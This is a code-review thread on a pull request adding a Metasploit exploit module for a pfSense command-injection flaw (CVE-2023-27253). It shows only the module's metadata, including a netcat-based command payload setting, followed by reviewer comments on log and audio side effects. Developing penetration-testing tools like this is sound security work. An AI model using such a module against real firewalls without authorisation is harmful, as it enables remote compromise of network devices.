modules/exploits/unix/http/pfsense_config_data_exec.rb

```diff
@@ -0,0 +1,190 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense Restore RRD Data Command Injection',
+        'Description' => %q{
+          This module exploits an OS Command Injection vulnerability in the pfSense
+          Config Module (CVE-2023-27253). The vulnerability affects versions <= 2.6.0
+          and can be exploited by an authenticated user if they have the
+          "WebCfg - Diagnostics: Backup & Restore" privilege.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emir Polat', # vulnerability discovery & metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-27253'],
+          ['URL', 'https://redmine.pfsense.org/issues/13935']
+        ],
+        'DisclosureDate' => '2023-03-18',
+        'Platform' => ['unix'],
+        'Arch' => [ ARCH_CMD ],
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'Payload' => {
+          'BadChars' => "\x2F\x27",
+          'Compat' =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'netcat'
+            }
+        },
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES]
```

Comment:
As this module requires authentication, the system will print a message to console indicating that a successful login (or failed login) was performed.

Presumably this module will also leave traces in the logs, in which case `IOC_IN_LOGS` would also be applicable.

Additionally, successful and failed logins result in an auditory beep using the system internal speaker in my test VM with a sound card connected. As such, `AUDIO_EFFECTS` may also be applicable -- although we haven't really standardised use of `AUDIO_EFFECTS` and I'm not sure how common it is to run pfSense on hardware with a sound card.

Reply:
Doesn't seem like any of the suggested changes were applied here. I'll have to run some more tests to verify but at the very least I would imagine `IOC_IN_LOGS` would apply here given the web driven nature of this bug and the fact that the web server logs will likely contain some traces of our exploitation.

Reply:
Going to not include the `AUDIO_EFFECTS` as whilst I did encounter audio during setup I didn't encounter any during testing despite having the audio card connected. If I find evidence to the contrary I'm happy to update, but not got enough to conclusively say this should be included right now.